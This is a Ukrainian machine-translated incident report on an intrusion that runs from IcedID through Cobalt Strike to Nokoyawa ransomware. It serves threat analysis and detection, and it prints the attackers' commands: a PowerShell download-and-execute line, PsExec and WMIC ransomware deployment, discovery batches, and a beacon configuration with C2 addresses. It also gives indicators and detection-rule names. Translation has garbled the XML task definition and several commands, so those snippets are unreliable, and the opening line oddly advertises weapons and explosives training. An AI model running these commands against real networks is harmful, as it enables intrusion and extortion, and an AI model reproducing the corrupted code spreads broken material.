Читачеві пропонується до вивчення матеріали де він зможе навчитися поводженню зі зброєю, вибуховими речовинами,та отриати потрібну інформацію
986 
Сучасний ландшафт кібербезпеки заснований на незліченних вимогах та небезпеках, що призводять до постійних інновацій у світі кіберзлочинності. Кіберзлочинці постійно шукають нові та винахідливі способи здійснення атак і отримання несанкціонованого доступу до цінних даних та ресурсів. У такому контексті, інциденти, пов’язані з використанням HTML-макросів та вірусів-вимагачів, зокрема Nokoyawa, набувають особливого значення. Ця стаття присвячена аналізу одного з нових та небезпечних методів атаки, який включає в себе використання HTML-макросів та вірусів-вимагачів для вторгнення та поширення загрози. Ми вивчимо цей інцидент без використання конкретних прикладів, але зосередимося на загальних характеристиках та етапах атаки. HTML-макроси: Вхідна ворожа точка. HTML-макроси, відомі також як макроси веб-сторінок, раніше використовувалися для реалізації функціональності на веб-сайтах та в електронних документах.
Однак з часом кіберзлочинці виявили спосіб використання цих макросів як засіб для створення ефективних атак. Інцидент, який ми розглядаємо, розпочався з електронної доставки HTML-файлу, який призвів до запуску атаки. Під час аналізу виявлено, що ця доставка відбулася через електронну пошту, що робить цей метод атаки особливо небезпечним. Контрабанда HTML: Засіб обману. HTML-файл, відкритий користувачем, спричинив відображення підробленої сторінки Adobe та завантаження ZIP-архіву. Один з основних аспектів цього етапу атаки – це використання методу, відомого як контрабанда HTML. Основна ідея полягає в тому, що користувач бачить фіктивну сторінку, тоді як за кулісами відбувається завантаження шкідливого вмісту. ZIP-архів містив зашифрований пароль, який був призначений для захисту від автоматизованого аналізу шкідливого вмісту. Це був лише перший крок у спритному плані кіберзлочинців. Від ZIP до Nokoyawa: Внутрішній зміст. Усередині ZIP-архіву містився файл формату ISO. Та ось основна хитрість – він містив у собі корисне навантаження зловмисного програмного забезпечення, але цей файл був прихований за шаром захисту. Для розкриття цього шару, зловмисники використали LNK-файл, який маскувався під документ. І коли користувач натиснув на цей LNK-файл, було виконано послідовність команд, яка включала копіюван ня шкідливого вмісту із ISO-файлу на хост перед запуском зловмисного програмного забезпечення. Вірус-вимагач Nokoyawa: Завершальний акт. Після завантаження шкідливої DLL було встановлено з’єднання з командним та контрольним серверами IcedID, що є ще однією загрозою в цьому інциденті. Користувач, тим часом, бачив легітимне зображення фінансового документа, а не відображення атаки. Зловмисники також використовували різні інструменти та команди для виявлення і розгортання свого шкідливого програмного забезпечення. Вони маневрували у мережі та використовували різні методи для намагань отримати несанкціонований доступ та здійснити атаки.
На початку листопада 2022 року вторгнення почалося з доставки HTML-файлу. Ми з високою впевненістю оцінюємо, що доставка була електронною поштою, як повідомлялося в інших публічних звітах . Цей файл HTML використовував техніку, відому як контрабанда HTML. Це один із методів, до якого звернулися зловмисники після того, як корпорація Майкрософт оновила стандартні параметри керування макросами. Буквально місяць тому цей загрозливий діяч спостерігався за допомогою макросів Excel у надзвичайно подібній кампанії .
Коли користувач відкривав HTML-файл, відображалася підроблена сторінка Adobe і завантажувався ZIP-файл. Adobe lure містить пароль для ZIP як спосіб захисту шкідливого вмісту від автоматизованого аналізу. Всередині ZIP був файл ISO. Всередині ISO було корисне навантаження зловмисного програмного забезпечення. Єдиним видимим для користувача файлом був файл LNK, який маскувався під документ.
Коли користувач натискав файл LNK, виконувалася серія команд. Це включало копіювання rundll32 і шкідливої DLL з ISO на хост перед запуском шкідливого програмного забезпечення. Після завантаження шкідливої DLL було встановлено з’єднання з командними та контрольними серверами IcedID. Тим часом користувач отримав легітимне зображення фінансового документа.
Коли зловмисну DLL було виконано, постійність також була встановлена через заплановане завдання на базовому хості. Це завдання було встановлено для запуску зловмисного програмного забезпечення IcedID щогодини на хості. Початкові команди виявлення було запущено через кілька секунд після звернення до сервера команд і керування.
Приблизно через три години після виконання початкового зловмисного програмного забезпечення IcedID з IcedID був породжений процес cmd. Цей новий процес почав передавати сигнали на сервер Cobalt Strike. Потім цей процес спостерігався під час доступу до LSASS, імовірно, для доступу до облікових даних. Також спостерігалася швидка перевірка адміністраторів домену за допомогою net.
Потім практичні дії призупинилися приблизно на три години, перш ніж актор, що загрожує, повернувся. Використовуючи маяк Cobalt Strike, зловмисник шукав певних адміністраторів домену за допомогою утиліти net. Використовуючи один із цих облікових записів, зловмисник ініціював сеанс RDP, щоб перейти до контролера домену. Використовуючи цей сеанс, актор загрози скопіював маяк Cobalt Strike на контролер домену та виконав його.
Після цього зловмисник продовжив дії виявлення, виконавши пакетний файл на контролері домену, який запускав звичайну батарею команд виявлення Active Directory за допомогою AdFind. Після завершення результати команд виявлення архівувалися за допомогою 7-Zip. Після цього зловмисник запустив другий пакетний файл, який ітерував по мережі, виконуючи nslookup для кожного хоста в середовищі.
Приблизно через п’ять годин зловмисник повернувся до контролера домену та виконав закодовану команду PowerShell, яка була SessionGopher. SessionGopher — це інструмент, який знаходить і розшифровує збережену інформацію про сеанс для інструментів віддаленого доступу. Потім зловмисник увійшов на додаткові хости через RDP, включаючи резервний сервер і сервер із спільними файлами. На сервері резервного копіювання зловмисник відкрив консоль резервного копіювання. Перебуваючи на спільному файлі, вони використовували блокнот для перегляду файлу на хості.
Зловмисник повернувся до контролера домену та використав Netscan для сканування мережі. Після сканування PsExec і WMIC використовувалися для переміщення файлів між системами в мережі. Скопійовані ключові файли включали k.exe та p.bat. Ці два файли були двійковим файлом програми-вимагача та пакетним сценарієм, який використовуватиметься для виконання програми-вимагача.
Через п’ять хвилин після передачі файлів на хости в домені двійковий файл програми-вимагача Nokoyawa був запущений на контролері домену. У той же час PsExec використовувався для виконання файлу p.bat, який запускає двійковий файл програми-вимагача на інших хостах у домені. Час до програм-вимагачів (TTR) становив трохи більше 12 годин після початкового зараження.
У цьому випадку ми бачимо двох різних суб’єктів загрози; дистриб’ютор і актор, який тримає руки на клавіатурі. Proofpoint відстежує цього дистриб’ютора як TA551 . Актор, який працює на клавіатурі, відстежується корпорацією Майкрософт як Storm-0390, яка є командою «перевірки пера» під керівництвом Periwinkle Tempest (раніше відстежувався як Storm-0193 і DEV-0193).
Помічено, що афілійована програма-вимагач використовує RDP у середовищі з імені сервера WIN-5J00ETD85P5. Це ім’я сервера збігається з ім’ям, яке використовує загроза з попередньої справи Nokoyawa . За допомогою інструментів інтернет-сканування ми бачимо, що це ім’я хосту наразі активне на 78.128.113[.]154, розміщеному на AS209160 Miti2000 на 4vendeta.com у Болгарії.
Для цієї кампанії для доставки шкідливого HTML-файлу використовувалися зламані електронні листи. За даними Proofpoint, ця кампанія була пов’язана з групою розповсюдження, яку вони відстежують як TA551. Подяка Proofpoint за наведений нижче приклад.
Після завантаження та відкриття файлу HTML він завантажив захищений паролем ZIP-файл із випадковою назвою. Користувачеві було надано пароль для розпакування файлу. На наступному зображенні показано файл HTML, відкритий у браузері.
Файл ISO з архіву zip під час монтування містив 1 видимий файл LNK (documents-9771) і 3 прихованих файли: demurest.cmd, pimpliest_kufic.png і templates544.png.
Після виконання відкривається законне зображення, щоб змусити користувача подумати, що нічого страшного.
Файл ISO містив файл LNK із піктограмою зображення, яке спонукало користувача клацнути його. Коли користувач відкривав файл LNK, виконувався пакетний сценарій demurest.cmd.
Пакетний сценарій у файлі demurest.cmd зробив наступне:
Відкрито pimpliest_kufic.png, у якому показано зображення.
Для копіювання rundll32.exe до %temp%\entails.exe використовувалася утиліта Windows xcopy.
Створив рядок «templates544.png» у середовищі виконання та скопіював його з випадковим числом у форматі: RANDOM_NUM.RANDOM_NUM.
templates544.png був DLL IcedID і виконувався через entails.exe.
Ми бачимо з пам’яті ( MemProcFS ), cmd виконує entails.exe, який виконує IcedID dll, переглядаючи командний рядок. Ми також можемо побачити ланцюжок викликів cmd->entails.exe з головним батьківським процесом explorer.exe.
Приблизно через шість годин після вторгнення 1.dll (Cobalt Strike) було скинуто на плацдарм, а потім скопійовано на контролер домену. Після перенесення 1.dll на контролер домену його було виконано через rundll32.exe за допомогою такої команди:
rundll32.exe 1.dll, DllRegisterServer
IcedID зареєстрував заплановане завдання для отримання стійкості на плацдармі, яке запускалося щогодини.
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Реєстраційна інформація>
<URI>\{E5C1C7DB-E36E-5B16-8E3A-6226D7E53A67}</URI>
</RegistrationInfo>
<Тригери>
<TimeTrigger id="TimeTrigger">
<Повторення>
<Інтервал>PT1H</Інтервал>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary>2012-01-01T12:00:00</StartBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
<LogonTrigger id="LogonTrigger">
<Enabled>true</Enabled>
<UserId>ВИДАЛЕНО</UserId>
</LogonTrigger>
</Triggers>
<Директори>
<Принципал id="Автор">
<RunLevel>Найвищий доступний</RunLevel>
<UserId>ВИДАЛЕНО</UserId>
<LogonType>InteractiveToken</LogonType>
</Principal>
</Principals>
<Налаштування>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Пріоритет>7</Пріоритет>
</Settings>
<Actions Context="Author">
<Exec>
<Command>rundll32.exe</Command>
<Аргументи>"C:\Users\REDACTED\AppData\Local\REDACTED\Izjeubaw64.dll",#1 --oyxo="EdgeDecrease\license.dat"</Arguments>
</Exec>
</Actions>
</Task>
Ми також можемо побачити подібну інформацію в пам’яті, переглядаючи нещодавно створені заплановані завдання:
Зламаний користувач мав права локального адміністратора на своєму комп’ютері, що дозволяло зловмиснику використовувати інструменти, які потребують вищих дозволів.
Переглядаючи вміст шкідливого файлу HTML, ми можемо виявити контрабанду HTML у коді. По-перше, дивлячись на <script>теги, ми приходимо до наступного:
Якщо ми візьмемо цей блок даних, декодуємо його вміст за допомогою base64 і експортуємо його у файл, ми зможемо знайти заархівований файл ISO, прихований у документі:
Заголовок PK вказує, що дані є початком файлу zip , а наведені нижче дані показують, що вміст є файлом ISO.
Початковий пакет доступу від загрози використовував утиліту Windows xcopy для перейменування rundll32.exe на entails.exe. Ймовірно, це уникає логіки виявлення, заснованої на виконанні командного рядка. Entails.exe, який завантажував IcedID DLL, потім було помічено введення в процес cmd.exe на базовому хості.
Нижче ми можемо побачити завантажувач IcedID у пам’яті в процесі entails.exe:
Процес entails.exe спочатку відкрив cmd.exe із GrantedAccess 0x1fffff, який відповідає правам PROCESS_ALL_ACCESS , а потім виклик CreateRemoteThread, який був записаний Sysmon Event ID 10 і 8 відповідно, як показано нижче:
Ми також бачимо з пам’яті, beacon.dll було введено в cmd.
Під час сканування пам’яті процесу cmd.exe спрацювало правило YARA win_cobalt_strike_auto від Malpedia. Наступну конфігурацію маяка Cobalt Strike було витягнуто з пам’яті процесу:
"BeaconType": "windows-beacon_https-reverse_https", "Порт": 443, «Час сну»: 60000, "Maxgetsize": 1048576, "Джиттер": 0, "MaxDns": 0, «PublicKey»: «30 81 9f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 81 8d 00 30 81 89 02 81 81 00 a7 38 cd e7 5f 1f bb 1c 18 64 6c 37 7e 03 01 6b 16 2b 12 ba 72 bd f7 dc 36 b4 cd 2e 4e 9b ae 12 20 5a 95 c2 61 70 bf 90 81 05 ad 7f a4 bb cc fa 79 86 32 26 1b ed 98 70 f9 75 f2 07 94 e1 fe 49 95 23 d7 1f 08 a5 6c ae 03 15 bf de 3d 6c 8a 16 38 6b 03 b7 a6 55 1a a1 33 6d 50 32 5a 35 00 db 27 d7 8a d8 fd 13 b6 a7 3b 9f b7 c3 fb 4d 7a 08 8 е 32 3f 07 61 86 56 ec d8 35 95 fa 5f 82 36 13 02 03 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0 0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00", "c2_server": "5.8.18.242,/pixel.gif", "UserAgent": "Mozilla/4.0 (сумісний; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)", "PostURI": "/submit.php", "Malleable_C2_Instructions2": "", "HttpGetHeader": "Cookie", "HttpPostHeader": "\n\u0026Content-Type: application/octet-streamid", "SpawnTo": "", "Назва каналу": "", "KillDateYear": 0, "KillDateMonth": 0, "KillDateDay": 0, "DNSIdle": "0.0.0.0", "DNSSleep": 0, "SSH_1": "", "SSH_2": "", "SSH_3": "", "SSH_4": "", "SSH_5": "", "GetVerb": "ОТРИМАТИ", "PostVerb": "POST", "HttpPostChunk": 0, "SpawnTox86": "%windir%\\syswow64\\rundll32.exe", "SpawnTox64": "%windir%\\sysnative\\rundll32.exe", "Криптосхема": 0, "Проксі": "", "ProxyUsername": "", "ProxyPassword": "", "ProxyType": "Налаштування IE", "Застарілий": 0, "LicenseId": 305419776, "bStageCleanup": 0, "bCFGCaution": 0, "KillDate": 0, "TextSectionEnd": 0, "ObfuscateSectionsInfo": "", "ProcessInjectStartRWX": "PAGE_EXECUTE_READWRITE", "ProcessInjectUseRWX": "PAGE_EXECUTE_READWRITE", "ProcessInjectMinAlloc": 0, "ProcessInjectTransformx86": "", "ProcessInjectTransformx64": "", "Використовує файли cookie": 1, "ProcessInjectExecute": "", "ProcessInjectAllocationMethod": 0, "ProcessInjectStub": "b5 4a fe 01 ec 6a 75 ed f3 5e 1a 44 f8 bd 39 29", "HostHeader": ""
IP та порт відповідають тому, що ми бачимо в пам’яті:
Введений cmd.exe, у свою чергу, вставляється в rundll32.exe.
Схоже, що Cobalt Strike використовувався для доступу до простору пам’яті LSASS. Наданий доступ був 0x1010 & 0x1fffff. Ці значення можна використовувати для ідентифікації доступу за обліковими даними.
Труби були створені з префіксом “postex_” Cobalt Strike за замовчуванням.
На одному з контролерів домену було помічено, що закодована команда PowerShell виконується з маяка Cobalt Strike.
Після декодування ця команда показала виконання сценарію SessionGopher .
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:8897/'); Invoke-SessionGopher
Після завантаження IcedID DLL через перейменований rundll32 на хості плацдарму спостерігалися такі команди виявлення:
cmd.exe /c chcp >&2 ipconfig /все системна інформація робоча станція net config nltest /domain_trusts nltest /domain_trusts /all_trusts net view /все /домен net view /все net група «Адміністратори домену» /domain
У рамках команд виявлення IcedID використовував WMI, щоб отримати список антивірусних продуктів, встановлених на базовому хості, за допомогою такої команди:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Шлях AntiVirusProduct Get * /Format:List
Зловмисник також запустив такі команди виявлення через cmd.exe (введений процес Beacon):
net group "адміністратори домену" /domain net user [ВИДАЛЕНО АДМІНІСТРАТОРА ДОМЕНУ] /домен net user Адміністратор/домен net user [ВИДАЛЕНО АДМІНІСТРАТОРА ДОМЕНУ] /домен cmd.exe /C каталог *.txt cmd.exe /C каталог *.dll
AdFind використовувався для виявлення на контролері домену за допомогою пакетного сценарію під назвою adfind.bat. Сценарій виконував такі команди:
adfind.exe -f (objectcategory=person) > ad_users.txt adfind.exe -f objectcategory=computer > ad_computers.txt adfind.exe -f (objectcategory=organizationalUnit) > ad_ous.txt adfind.exe -subnets -f (objectCategory=subnet) > ad_subnets.txt adfind.exe -f "(objectcategory=group)" > ad_group.txt adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt 7.exe a -mx3 ad.7z ad_* del 7.exe adfind* ad_*
Після цього зловмисник скинув новий пакетний файл ns.bat. Цей файл містив список хостів у мережі для виконання DNS-пошуку за допомогою nslookup.
C:\Windows\system32\cmd.exe /C ns.bat nslookup [ВИДАЛЕНО ХОСТ X] ... nslookup [ВИДАЛЕНО ХОСТ XX]
Незадовго до початку розгортання програми-вимагача зловмисник підключився до резервного сервера та відкрив консоль резервного копіювання на хості. Після цього було виконано остаточне виявлення на контролері домену за допомогою інструменту SoftPerfect Netscan , який використовувався для остаточного сканування виявлення в мережі.
Зловмисник підключився до різних хостів у мережі через тунель RDP через процес маяка на головному хості.
Ми можемо знайти ім’я хоста загрози, присутнє в деяких журналах Windows, ідентифікатори події 4624, 4776, 4778 і 4779.
WIN-5J00ETD85P5
Назва робочої станції, помічена в події 4624 на плацдармі:
Знову в події 4776 від контролера домену:
І знову 4778, а потім 4779 на контролері домену:
Під час сеансу RDP 1.dll (Cobalt Strike DLL) було передано з плацдарму через Провідник файлів Windows.
Подібним чином остаточні файли, які використовувалися для виконання розгортання програми-вимагача, були передані таким же чином, що можна побачити в процесі реєстрації створення файлу як Explorer.EXE.
Після того, як k.exe і p.bat, а також різні інші пакетні сценарії було передано на скомпрометований контролер домену, зловмисник спробував скопіювати k.exe на інші комп’ютери в мережі за допомогою команди копіювання , виконаної на контролері домену.
Можливо, це виконання команди не спрацювало належним чином, або як резервну копію актор загрози знову запустив команду копіювання, але цього разу замість виконання cmd /K copyна контролері домену вони запустили wmic для виконання команди копіювання з віддаленого хосту.
Цей процес було повторено для p.bat, це повторення вказує на те, що це був сценарій, а не невдале виконання процесу копіювання.
Спочатку скопіюйте команду, видану на контролер домену:
По-друге, скопіюйте команду за допомогою WMIC, щоб віддалені хости запустили команду.
Після того як k.exe і p.bat було скопійовано на комп’ютери в мережі, зловмисник використовував PsExec.exe, щоб віддалено створити службу під назвою mstdc для запуску p.bat (p.bat запускає k.exe, який шифрує систему на основі конфігурації в кодуванні Base64) через системний обліковий запис.
На кожному хості, що приймає PsExec, створено файл «.key». Ім’я файлу містить ім’я хоста машини, яка ініціювала PsExec.
Після завершення роботи AdFind результати архівувалися за допомогою 7-Zip.
IcedID Після того, як entails.exe (rundll32.exe) успішно виконав templates544.png на базовому хості, було встановлено вихідне з’єднання з trentonkaizerfak[.]com.
Це завантажило файл gzip для наступного етапу IcedID. Після виконання цього корисного навантаження командування та керування було встановлено для 5.255.103[.]16
Після впровадження в cmd.exe на базовому хості було створено 1.dll (Cobalt Strike DLL), який пізніше було передано на контролер домену. Потім 1.dll було виконано на контролері домену через rundll32.exe, і після виконання rundll32.exe підключився до командного та контрольного сервера 5.8.18[.]242.
Було помічено, що зловмисник розгортає програму-вимагач Nokoyawa у всьому середовищі, використовуючи як PSExec, так і WMIC.
psexec.exe \\[ЦІЛЬОВА IP-адреса] -u [ДОМЕН]\[КОРИСТУВАЧ] -p "[ПАРОЛЬ]" -s -d -h -r mstdc -accepteula -nobanner c:\windows\temp\p.bat
wmic /node:"[TARGET IP]" /user:"[DOMAIN]\[USER]" /password:"[PASSWORD]" виклик процесу create "cmd.exe /cc:\windows\temp\p.bat"
Це дублювання виконання за допомогою як PsExec, так і WMIC відображає подвоєні команди, які використовуються для копіювання файлів у мережі, вказуючи на виконання за сценарієм для резервування.
Пакетний файл (p.bat) відповідає за виконання двійкового файлу програми-вимагача (k.exe) разом із його конфігураціями.
c:\windows\temp\k.exe --config ВИДАЛЕНО
Після перегляду конфігурації, наданої в параметрах команди, ця програма-вимагач налаштована на шифрування мережі, завантаження прихованих дисків і видалення тіньових копій томів.
Крім того, конфігурація інформує двійковий файл програми-вимагача пропускати наступні каталоги та розширення файлів.
Виключені каталоги - Вікна - Програмні файли - Програмні файли (x86) - Дані програми - ProgramData - Інформація про системний том Виключені розширення файлів - .exe - .dll - .ini - .lnk - .url - ""
Примітка про викуп.
Нокоява.
Якщо ви бачите це, ваші файли були успішно зашифровані.
Радимо не шукати безкоштовний метод дешифрування.
Це неможливо. Ми використовуємо симетричне та асиметричне шифрування.
УВАГА:
- Не перейменовуйте зашифровані файли.
- Не змінюйте зашифровані файли.
- Не використовуйте стороннє програмне забезпечення.
Для досягнення згоди пропонуємо вам відвідати наш сайт Onion.
Як відкрити посилання Onion:
- Завантажте браузер TOR з офіційного сайту.
- Відкрийте та введіть це посилання:
http://[ВИДАЛЕНО]
- На сторінці ви побачите чат зі службою підтримки.
- Надішліть своє перше повідомлення.
Чим швидше ви зв’яжетеся з нами, тим швидше ви отримаєте рішення.
Кобальтовий удар: 5.8.18.242:443 IcedID: trentonkaizerfak[.]com на 159.89.12.125:80 questdisar[.]com за адресою 5.255.103.16:443 pikchayola[.]фотографії на 5.255.103.16:443
1.dll 9740f2b8aeacc180d32fc79c46333178 c599c32d6674c01d65bff6c7710e94b6d1f36869 d3db55cd5677b176eb837a536b53ed8c5eabbfd68f64b88dd083dc9ce9ffb64e 8c11812d-65fd-48ee-b650-296122a21067.zip 4f4231ca9e12aafac48a121121c6f940 7bd217554749f0f3c31957a37fc70d0a86e71fc3 be604dc018712b1b1a0802f4ec5a35b29aab839f86343fc4b6f2cb784d58f901 adfind.bat ebf6f4683d8392add3ef32de1edf29c4 444c704afe4ee33d335bbdfae79b58aba077d10d 2c2513e17a23676495f793584d7165900130ed4e8cccf72d9d20078e27770e04 demurest.cmd 586fe6d361ef5208fad28c5ff8a4579b bf4177381235393279e7cdfd45a3fa497b7b8a96 364d346da8e398a89d3542600cbc72984b857df3d20a6dc37879f14e5e173522 документи-9771.lnk 51e416c3d3be568864994449cd39caa1 ee1c5e9f1257fbda3b174d534d06dddf435d3327 57842fe8723ed6ebdf7fc17fc341909ad05a7a4feec8bdb5e062882da29fa1a8 k.exe 40c9dc2897b6b348da88b23deb0d3952 0f5457b123e60636623f585cc2bf2729f13a95d6 7095beafff5837070a89407c1bf3c6acf8221ed786e0697f6c578d4c3de0efd6 netscan.exe 16ef238bc49b230b9f17c5eadb7ca100 a5c1e4203c740093c5184faf023911d8f12df96c ce6fc6cca035914a28bbc453ee3e8ef2b16a79afc01d8cb079c70c7aee0e693f p.bat 385d21c0438f5b21920aa9eb894740d2 5d2c17799dfc6717f89cd5f63951829aed038041 e351ba5e50743215e8e99b5f260671ca8766886f69d84eabb83e99d55884bc2f psexec.exe c590a84b8c72cf18f35ae166f815c9df b97761358338e640a31eef5e5c5773b633890914 57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4 pimpliest_kufic.png 49524219dbd2418e3afb4e49e5f1805e b8cb71c48a7d76949c93418ddd0bcae587bef6cc c6294ebb7d2540ee7064c60d361afb54f637370287983c7e5e1e46115613169a redated-invoice-10.31.22.html c8bdc984a651fa2e4f1df7df1118178b f62b155ab929b7808de693620d2e9f07a9293926 31cd7f14a9b945164e0f216c2d540ac87279b6c8befaba1f0813fbad5252248b templates544.png 14f37c8690dda318f9e9f63196169510 306e4ede6c7ea75ef5841f052f9c40e3a761c177 e71772b0518fa9bc6dddd370de2d6b0869671264591d377cdad703fa5a75c338
ET HUNTING Підозрілий порожній сертифікат SSL - спостерігається в Cobalt Strike ET INFO RDP - відповідь на зовнішній хост ET MALWARE Meterpreter або інший сертифікат зворотної оболонки SSL ET MALWARE Win32/IcedID Request Cookie ET ПОЛІТИКА OpenSSL Demo CA - Internet Widgits Pty (O) Створено службу ET POLICY PsExec ET ПОЛІТИКА SMB Передача виконуваних файлів ПОЛІТИКА ET SMB2 NT Створення запиту AndX для файлу .bat ПОЛІТИКА ET SMB2 NT Створення запиту AndX для файлу DLL - можливий бічний рух ПОЛІТИКА ET SMB2 NT Створення запиту AndX для виконуваного файлу ПОЛІТИКА ET SMB2 NT Створення запиту AndX для виконуваного файлу в каталозі Temp ET RPC DCERPC SVCCTL – доступ диспетчера віддаленого керування службами ET SCAN Поведінка Незвичайний трафік Порт 135 Потенційне сканування або зараження ET SCAN Поведінка Незвичайний трафік Порт 445 Потенційне сканування або зараження ET SCAN Поведінковий Незвичайно швидкий трафік сервера терміналів Потенційне сканування або зараження (вхідний) ET SCAN Поведінковий Незвичайно швидкий трафік сервера терміналів Потенційне сканування або зараження (вихідний)
Репо звіту DFIR:
CHCP CodePage Locale Lookup dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f AdFind Discovery 50046619-1037-49d7-91aa-54fc92923604
Поганий Opsec за замовчуванням жертвуючі процеси з неправильними аргументами a7c3d773-caef-227e-a7e7-c2f13c622329 Змініть політики PowerShell на незахищений рівень 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 CMD Shell Output Redirect 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a Схема впорскування CobaltStrike BOF 09706624-b7f6-455d-9d02-adee024cee1d Перший раз побачений віддалений канал з назвою 52d8b0c6-53d6-439a-9e41-52ad442ad9ad Файл ISO, створений у тимчасових папках 2f9356ae-bf43-41b8-b858-4496d83b2acb ISO Image Mount 0248a7bc-8a9a-4cd8-a57e-3ae8e073a073 Новий процес, створений через Wmic.EXE 526be59f-a573-4eea-b5f7-f0973207634d Net.exe Виконання 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac Неінтерактивний процес PowerShell породив f4bbd493-b796-416e-bbf2-121235348529 Потенційне ухилення від оборони через перейменування дуже релевантних двійкових файлів 0ba1da6d-b6ce-4366-828c-18826c9de23e Потенційне виконання інструментів Sysinternals 7cccd811-7ae9-4ebe-9afd-cb5c406b824b Потенційна розвідувальна діяльність через Nltest.EXE 5cc90652-4cbd-4241-aa3b-4b462fa5a248 Створення процесу за допомогою папки Sysnative 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab Виконання Psexec 730fc21b-eaff-474b-ad23-90fd265d4988 Виконання Rundll32 без файлу DLL c3a99af4-35a9-4668-879e-c09aeb4f2bdf Спільний доступ і перерахування сеансів за допомогою Net.EXE 62510e69-616b-4078-b371-847da438cc03 SMB Create Remote File Admin Share b210394c-ba12-4f89-9117-44a2464b9511 Підозрілий виклик за порядковим номером e79a9e79-eb72-4e78-a628-0e7e8f59e89c Підозріле копіювання з або до System32 fff9d2b7-e11c-4a69-93d3-40ef66189767 Підозріло закодований командний рядок PowerShell ca2092a1-c273-4878-9b4b-0d60115bf5ea Підозріле виконання імені хосту 7be5fb68-f9ef-476d-8b51-0256ebece19e Розвідка підозрілої групи та облікового запису за допомогою Net.EXE d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 Підозріла маніпуляція обліковими записами за замовчуванням через Net.EXE 5b768e71-86f2-4879-b448-81061cbae951 Підозріла мережева команда a29c1813-ab1f-4dde-b489-330b952e91ae Підозрілий процес, створений через Wmic.EXE 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 Підозрілий Rundll32 без будь-яких параметрів командного рядка 1775e15e-b61b-4d14-a1a3-80981298085a Виконання дистанційної команди WMIC 7773b877-5abb-4a3e-b9c9-fd0369b59b00 WmiPrvSE створив процес d21374ff-f574-44a7-9998-4a8c8bf33d7d Труба під назвою CobaltStrike d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 Підозріле виконання Systeminfo 0ef56343-059e-4cb6-adc1-4c3c967c5e46
986 
1660 
2670